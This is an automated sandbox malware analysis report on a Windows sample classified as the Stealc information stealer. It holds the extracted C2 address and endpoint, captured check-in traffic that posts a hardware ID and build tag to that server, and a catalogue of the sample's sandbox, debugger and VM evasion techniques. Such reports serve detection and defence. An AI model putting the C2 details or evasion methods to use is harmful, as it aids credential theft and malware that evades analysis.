Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1538495
MD5:23b93e56b64c319ccc5f1754135ebd10
SHA1:618c1cc4b62e2ef7ec0af6462a180910e6ffe973
SHA256:f0c4061792e560aa59a73574ea3824945a4394298bf2b9ad3e5b494e233c9790
Tags:exeStealcuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 23B93E56B64C319CCC5F1754135EBD10)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000003.1656947886.0000000004D40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7008JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7008JoeSecurity_StealcYara detected StealcJoe Security
              SourceRuleDescriptionAuthorStrings
              1.2.file.exe.eb0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-21T13:10:17.622612+020020442431Malware Command and Control Activity Detected192.168.2.949705185.215.113.3780TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: 1.2.file.exe.eb0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Source: file.exeReversingLabs: Detection: 47%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,1_2_00EBC820
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00EB9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00EB7240
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB9B60 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00EB9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_00EC8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00EC38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00EC4910
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00EBDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00EBE430
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_00EC4570
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_00EBED20
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00EB16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00EC3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00EBF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_00EBBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00EBDE10

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49705 -> 185.215.113.37:80
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 38 46 42 42 32 36 43 37 35 31 31 39 39 31 36 32 37 33 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 2d 2d 0d 0a Data Ascii: ------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="hwid"5C8FBB26C7511991627337------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="build"doma------AAEBAKKJKKEBKFIDBFBA--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_00EB4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 38 46 42 42 32 36 43 37 35 31 31 39 39 31 36 32 37 33 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 2d 2d 0d 0a Data Ascii: ------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="hwid"5C8FBB26C7511991627337------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="build"doma------AAEBAKKJKKEBKFIDBFBA--
                Source: file.exe, 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1705510345.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/a
                Source: file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1705510345.0000000000AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
                Source: file.exe, 00000001.00000002.1705510345.0000000000ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG
                Source: file.exe, 00000001.00000002.1705510345.0000000000AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph
                Source: file.exe, 00000001.00000002.1705510345.0000000000A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37so

                System Summary

                barindex
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C010E1_2_011C010E
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011B51C51_2_011B51C5
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0127D8391_2_0127D839
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012828A21_2_012828A2
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012490C91_2_012490C9
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011FAB3C1_2_011FAB3C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011D93751_2_011D9375
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01204A321_2_01204A32
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0127A2591_2_0127A259
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01236AE11_2_01236AE1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012895361_2_01289536
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01276D061_2_01276D06
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0127BDAB1_2_0127BDAB
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0113AC481_2_0113AC48
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0111B4BF1_2_0111B4BF
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0126A4D31_2_0126A4D3
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0126CF271_2_0126CF27
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01285E9D1_2_01285E9D
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0127FE981_2_0127FE98
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00EB45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: qmrtgfvc ZLIB complexity 0.9948942253388554
                Source: file.exe, 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1656947886.0000000004D40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_00EC8680
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_00EC3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\53WVB1CW.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 47%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1856000 > 1048576
                Source: file.exeStatic PE information: Raw size of qmrtgfvc is bigger than: 0x100000 < 0x19f000

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.eb0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qmrtgfvc:EW;elheadqd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qmrtgfvc:EW;elheadqd:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00EC9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c9d58 should be: 0x1cf7a8
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: qmrtgfvc
                Source: file.exeStatic PE information: section name: elheadqd
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C010E push 31BB5D13h; mov dword ptr [esp], edx1_2_011C0152
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C010E push 5BCC052Dh; mov dword ptr [esp], eax1_2_011C0331
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C010E push ebp; mov dword ptr [esp], edx1_2_011C038D
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C010E push 56DEA6D2h; mov dword ptr [esp], ebx1_2_011C03AE
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C010E push 3203C0E8h; mov dword ptr [esp], esi1_2_011C0421
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C010E push 7525BEBAh; mov dword ptr [esp], ecx1_2_011C0438
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C010E push eax; mov dword ptr [esp], esi1_2_011C044A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011C010E push edx; mov dword ptr [esp], 7FB73BA1h1_2_011C0461
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01316925 push esi; mov dword ptr [esp], ecx1_2_0131696A
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01316925 push 07727874h; mov dword ptr [esp], edi1_2_0131698C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011B7901 push ecx; mov dword ptr [esp], eax1_2_011B7932
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0132A11F push eax; mov dword ptr [esp], edx1_2_0132A138
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0128E910 push edx; mov dword ptr [esp], 11DB4822h1_2_0128E957
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0132796E push 3989B282h; mov dword ptr [esp], ecx1_2_013279CE
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013531AD push eax; mov dword ptr [esp], edi1_2_013531B7
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0136C9AE push ecx; mov dword ptr [esp], eax1_2_0136CA1C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012B19B5 push eax; mov dword ptr [esp], 44CEF600h1_2_012B19D8
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012B19B5 push 693400D6h; mov dword ptr [esp], ebx1_2_012B1A11
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012B19B5 push 47A017B8h; mov dword ptr [esp], ebp1_2_012B1A2B
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013701E6 push esi; mov dword ptr [esp], 6CFF13EAh1_2_0137020B
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_013701E6 push esi; mov dword ptr [esp], ebx1_2_013702D1
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00ECB035 push ecx; ret 1_2_00ECB048
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011B51C5 push edx; mov dword ptr [esp], edi1_2_011B5271
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011B51C5 push edx; mov dword ptr [esp], eax1_2_011B528F
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011B51C5 push ebp; mov dword ptr [esp], 6D8FDDB1h1_2_011B52D7
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011B51C5 push eax; mov dword ptr [esp], edi1_2_011B52E2
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011B51C5 push ebp; mov dword ptr [esp], ebx1_2_011B5343
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011B51C5 push eax; mov dword ptr [esp], edi1_2_011B53B3
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011B51C5 push ecx; mov dword ptr [esp], 6130C492h1_2_011B53B9
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011B51C5 push 6F735200h; mov dword ptr [esp], esi1_2_011B5404
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012F29DC push eax; mov dword ptr [esp], edi1_2_012F2A13
                Source: file.exeStatic PE information: section name: qmrtgfvc entropy: 7.95313047636981

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00EC9860

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-13601
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128E6CC second address: 128E6DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5CB8E4DD9Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128E6DC second address: 128E6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128EAB7 second address: 128EABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128EABB second address: 128EACB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5CB8E48996h 0x00000008 ja 00007F5CB8E48996h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128EACB second address: 128EAE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F5CB8E4DD96h 0x00000009 push esi 0x0000000a pop esi 0x0000000b jnl 00007F5CB8E4DD96h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128EAE1 second address: 128EAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 128EAE5 second address: 128EAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1291372 second address: 129137C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129137C second address: 1291380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 129152E second address: 1291538 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5CB8E4899Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
